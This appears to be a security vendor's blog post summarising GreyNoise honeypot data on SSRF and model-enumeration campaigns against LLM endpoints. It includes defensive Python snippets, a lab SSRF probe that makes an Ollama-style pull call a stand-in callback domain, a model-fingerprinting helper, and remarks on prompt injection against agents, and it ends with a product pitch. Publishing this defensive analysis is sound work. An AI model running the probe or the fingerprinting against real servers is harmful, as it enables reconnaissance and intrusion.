
GreyNoise Confirmed: Active Campaigns are Systematically Probing Enterprise LLMs
The era of theoretical AI risk has officially ended. Between October 2025 and January 2026, the GreyNoise honeypot infrastructure captured 91,403 attack sessions specifically targeting LLM endpoints. This is not casual script-kiddie activity or routine background internet noise. It represents a coordinated, industrial-scale effort to map the expanding attack surface of enterprise AI.
The data reveals two distinct campaigns that should serve as a wake-up call for any organization moving AI from experimental sandboxes into production:
- The SSRF Campaign: Focused on exploiting model pull functionality to force outbound connections.
- The Enumeration Campaign: A massive effort probing 73+ model endpoints to identify misconfigured proxies.
What makes these findings critical is the sheer volume and precision of the activity. Attackers are no longer just curious about what LLMs can do. They are actively inventorying exposed infrastructure to build target lists for future exploitation.
Breaking Down the SSRF Campaign and Model Pull Vulnerabilities
The first campaign identified by GreyNoise highlights a classic vulnerability: Server-Side Request Forgery (SSRF). Attackers targeted the way AI infrastructure handles model pulls, specifically focusing on two vectors:
- Ollama Model Pulls: Injecting malicious registry URLs to trick servers into initiating outbound HTTP requests.
- Twilio Webhooks: Manipulating MediaUrl parameters to trigger similar outbound connections.
A significant portion of this activity utilized ProjectDiscovery’s Out-of-band Application Security Testing (OAST) infrastructure. This allows attackers to confirm successful exploitation through callback validation. If the server "phones home" to the OAST domain, the vulnerability is confirmed.
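To make the mechanics concrete, here is a minimal Python sketch of how such a probe can be reproduced against your own lab instance to verify whether it will "phone home." The endpoint path, request field, and callback domain are illustrative assumptions for an Ollama-style pull API, not payloads taken from the GreyNoise capture.

```python
"""Lab-only illustration of an SSRF-style model pull probe.

Assumptions: the target exposes an Ollama-style pull endpoint at /api/pull
that accepts a model reference which may embed a registry hostname, and
"callback.oast.example" stands in for an out-of-band domain you control.
"""
import requests

TARGET = "http://127.0.0.1:11434"            # your own lab instance, never a third party
CALLBACK_DOMAIN = "callback.oast.example"    # hypothetical OAST-style callback domain

# The probe asks the server to pull a "model" hosted on the callback domain.
# If the server initiates an outbound HTTP request to that domain, the SSRF
# is confirmed -- which is exactly why strict egress filtering matters.
# Note: the exact JSON field name ("model" vs "name") varies by version.
payload = {"model": f"{CALLBACK_DOMAIN}/library/probe-model"}

resp = requests.post(f"{TARGET}/api/pull", json=payload, timeout=10)
print(resp.status_code, resp.text[:200])
```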
GreyNoise observed a dramatic spike in this activity over the Christmas holiday, with over 1,600 sessions in just 48 hours. This timing is a classic hallmark of sophisticated operations, designed to exploit the reduced monitoring capacity of security teams during festive periods. For security leaders, this reinforces the need for rigorous egress filtering and runtime protection.
The LLM Enumeration Campaign: Mapping the AI Attack Surface
While the SSRF campaign was about exploitation, the second campaign discovered by GreyNoise was about something far more strategic: reconnaissance. Starting in late December 2025, two specific IP addresses launched a methodical probe that generated over 80,000 sessions in just eleven days. This was a systematic inventory hunting for misconfigured proxy servers, the "front doors" that organizations often put in place to manage access to commercial APIs.
The attackers tested every major model family, using innocuous queries to stay under the radar:
- OpenAI: Testing GPT-4o and its variants.
- Anthropic: Probing Claude Sonnet, Opus, and Haiku.
- Google Gemini: Targeting Gemini-based API formats.
- Open Source & Others: Systematic checks on Meta (Llama 3.x), DeepSeek, Mistral, Alibaba (Qwen), and xAI (Grok).
By sending simple questions like "How many states are there in the United States?" or the well-known "strawberry" letter-counting test, attackers can fingerprint the underlying model based on the response format and content. This allows them to determine exactly which model you are running and whether the endpoint is vulnerable to further abuse.
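The fingerprinting step needs nothing more sophisticated than inspecting the shape of the JSON that comes back. The sketch below is a simplified illustration assuming the publicly documented OpenAI, Anthropic, and Gemini response layouts; real campaigns likely also weigh headers, error strings, and latency.

```python
import json

def guess_backend(response_body: str) -> str:
    """Very rough fingerprint based on well-known response layouts.
    Field names reflect publicly documented API formats; anything
    beyond that is an assumption made for illustration."""
    try:
        data = json.loads(response_body)
    except json.JSONDecodeError:
        return "unknown (non-JSON response)"

    if "choices" in data and "usage" in data:
        return "OpenAI-compatible chat completions format"
    if data.get("type") == "message" and isinstance(data.get("content"), list):
        return "Anthropic Messages API format"
    if "candidates" in data:
        return "Gemini generateContent format"
    return "unknown"

# Example: a probe response whose structure alone reveals the backend.
sample = '{"id": "chatcmpl-1", "choices": [{"message": {"content": "50"}}], "usage": {}}'
print(guess_backend(sample))
```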
The infrastructure behind this campaign has a long history of CVE exploitation, suggesting that this enumeration is just the first step in a larger exploitation pipeline. In this environment, proactive security is no longer optional. Organizations must treat their AI endpoints with the same level of scrutiny as their most sensitive legacy infrastructure.
Why Threat Actors Are Treating LLMs Like Legacy Infrastructure
The GreyNoise data signals a fundamental shift in the threat landscape. Attackers are now treating LLM infrastructure with the same systematic approach they used for VPNs, Elasticsearch clusters, and CI/CD servers. This transition from "experimental" to "production" creates a dangerous gap because:
- Exposed Proxies: Organizations often expose model routes for convenience or testing, creating easy targets.
- Blind Spots: Traditional security tools often fail to distinguish between legitimate developer queries and malicious fingerprinting.
- High-Value Access: An exposed API proxy provides a gateway to the data and actions those models are authorized to perform.
To close this gap, organizations must adopt a security posture that is as sophisticated as the systems they are deploying.
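A quick way to see whether you fall into the "exposed proxy" category is to probe your own gateway the way these attackers would: ask it for a model list without any credentials. The sketch below assumes an OpenAI-compatible route layout and a hypothetical internal proxy URL; adapt both to your environment.

```python
import requests

PROXY_BASE = "https://llm-proxy.internal.example"  # hypothetical gateway URL

def check_unauthenticated_exposure(base_url: str) -> None:
    """Flag a proxy that answers model-listing requests without credentials.
    Assumes an OpenAI-compatible route layout (/v1/models)."""
    try:
        resp = requests.get(f"{base_url}/v1/models", timeout=10)  # deliberately no API key
    except requests.RequestException as exc:
        print(f"Could not reach {base_url}: {exc}")
        return
    if resp.status_code == 200:
        print("EXPOSED: model list returned without authentication")
        print(resp.text[:300])
    elif resp.status_code in (401, 403):
        print("OK: proxy rejects unauthenticated requests")
    else:
        print(f"Review manually: unexpected status {resp.status_code}")

check_unauthenticated_exposure(PROXY_BASE)
```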
From Reconnaissance to Exploitation in Agentic Systems
The GreyNoise findings represent "Phase 0" of a much more dangerous attack lifecycle targeting autonomous systems. Once a threat actor successfully fingerprints an LLM endpoint, the next step is often to exploit the agentic workflows built on top of it. If an attacker knows exactly which model you are running, they can craft highly targeted prompt injection attacks designed to subvert the actions those workflows are authorized to perform.
The risks in agentic systems move from simple data exposure to functional compromise:
- Subverted Actions: Agents could be tricked into executing unauthorized tools or modifying internal records (a minimal guard against this is sketched after this list).
- Protocol Abuse: Connections via the Model Context Protocol (MCP) could be hijacked to exfiltrate sensitive data.
- Persistence: Attackers can use identified endpoints to maintain long-term control over autonomous workflows.
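As a minimal illustration of containing the first of these risks, the sketch below validates every tool call an agent emits against an explicit allowlist before anything executes. It is a generic pattern, not tied to any particular agent framework; the tool names and argument sets are hypothetical.

```python
# Hypothetical allowlist: tool name -> the only argument names it may receive.
ALLOWED_TOOLS = {
    "search_knowledge_base": {"query"},           # read-only lookup
    "create_support_ticket": {"title", "body"},   # bounded write action
}

def validate_tool_call(tool_name: str, arguments: dict) -> bool:
    """Reject any tool the agent was never authorized to use, and any
    unexpected argument, before the call reaches a real system."""
    allowed_args = ALLOWED_TOOLS.get(tool_name)
    if allowed_args is None:
        return False                        # tool not on the allowlist
    return set(arguments) <= allowed_args   # no smuggled parameters

# An injected prompt that tries to call an unlisted tool is stopped here.
print(validate_tool_call("delete_customer_record", {"id": "42"}))              # False
print(validate_tool_call("search_knowledge_base", {"query": "refund policy"})) # True
```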
Defending the Perimeter: Practical Best Practices from the Front Lines
The GreyNoise findings provide a clear roadmap for defense. The first and most immediate step is to lock down model pulls. If you are running local model infrastructure like Ollama, you must configure it to accept models only from trusted registries and implement strict egress filtering. This prevents the SSRF-driven "phone home" callbacks that threat actors use to confirm successful exploitation.
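As one concrete illustration of that first step, the sketch below checks a requested model reference against an allowlist of trusted registries before a pull is ever forwarded. The parsing is a deliberate simplification of how registry hosts appear in model references; adapt it to your runtime and registry naming scheme.

```python
# Example allowlist; both hostnames are placeholders for your own trusted registries.
TRUSTED_REGISTRIES = {"registry.ollama.ai", "models.internal.example"}

def is_trusted_pull(model_ref: str) -> bool:
    """Allow a pull only if the model reference names a trusted registry.
    A bare name like "llama3.1" (no host component) is treated as the
    default registry; anything pointing elsewhere is rejected."""
    # References like "evil.oast.example/library/x" embed a host before
    # the first slash; bare model names do not.
    host = model_ref.split("/", 1)[0] if "/" in model_ref else ""
    if not host or "." not in host:
        return True                      # bare name -> default registry
    return host.lower() in TRUSTED_REGISTRIES

print(is_trusted_pull("llama3.1"))                               # True
print(is_trusted_pull("evil-callback.oast.example/library/x"))   # False
```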
Key defensive strategies include:
- Egress Filtering: Restrict outbound traffic to trusted IPs to block OAST callbacks.
- Pattern Monitoring: Alert on fingerprinting queries and rapid-fire requests across multiple endpoints.
- Vulnerability Discovery: Run AI red teaming exercises to find flaws before attackers do.
- Protocol Security: Deploy a specialized MCP scanner to ensure your data connections are secure.
Manual monitoring is rarely enough to keep pace with professional threat actors.
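To make pattern monitoring actionable, the sketch below flags clients that request an unusually large number of distinct model names in a short window, the signature of the enumeration campaign described above. The log record format here is an assumed simplification; map the fields to whatever your gateway actually emits.

```python
from collections import defaultdict
from datetime import datetime, timedelta

# Hypothetical parsed gateway log records: (timestamp, client_ip, requested_model).
LOG_RECORDS = [
    (datetime(2025, 12, 28, 3, 0, 1), "203.0.113.10", "gpt-4o"),
    (datetime(2025, 12, 28, 3, 0, 2), "203.0.113.10", "claude-3-5-sonnet"),
    (datetime(2025, 12, 28, 3, 0, 3), "203.0.113.10", "gemini-1.5-pro"),
    # ... tens of thousands more in a real capture
]

WINDOW = timedelta(minutes=10)
DISTINCT_MODEL_THRESHOLD = 20  # tune against your own traffic baseline

def find_enumeration_candidates(records):
    """Flag client IPs that probe many distinct model names shortly after
    their first request -- a simplification of a proper sliding window."""
    by_ip = defaultdict(list)
    for ts, ip, model in records:
        by_ip[ip].append((ts, model))

    suspects = []
    for ip, events in by_ip.items():
        events.sort()
        start = events[0][0]
        models = {m for ts, m in events if ts - start <= WINDOW}
        if len(models) >= DISTINCT_MODEL_THRESHOLD:
            suspects.append((ip, len(models)))
    return suspects

for ip, count in find_enumeration_candidates(LOG_RECORDS):
    print(f"Possible enumeration from {ip}: {count} distinct models probed")
```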
Securing the Future of AI Production
The GreyNoise report is a definitive signal that AI infrastructure has entered the mainstream threat cycle. As organizations move from experimental pilots to full-scale production, the "security by obscurity" that once protected internal LLM deployments is vanishing. The nearly 100,000 captured sessions prove that professional threat actors are already building the target maps they need to exploit the next generation of enterprise software.
Building a resilient AI strategy requires a shift from reactive patching to a foundation of trust and governance. This involves:
- Treating LLM endpoints and API proxies as high-value production assets.
- Ensuring the integrity of models and the safety of the actions they perform.
- Implementing continuous monitoring and red teaming.
In this evolving landscape, NeuralTrust stands as a credible reference for organizations that prioritize security and governance. As a platform dedicated to AI trust, NeuralTrust provides the essential tools for runtime protection, AI Red Teaming, and governance that modern enterprises require. By partnering with experts focused on the unique challenges of AI security, you can build with confidence, knowing that your systems are protected against the sophisticated reconnaissance and exploitation tactics identified by GreyNoise.



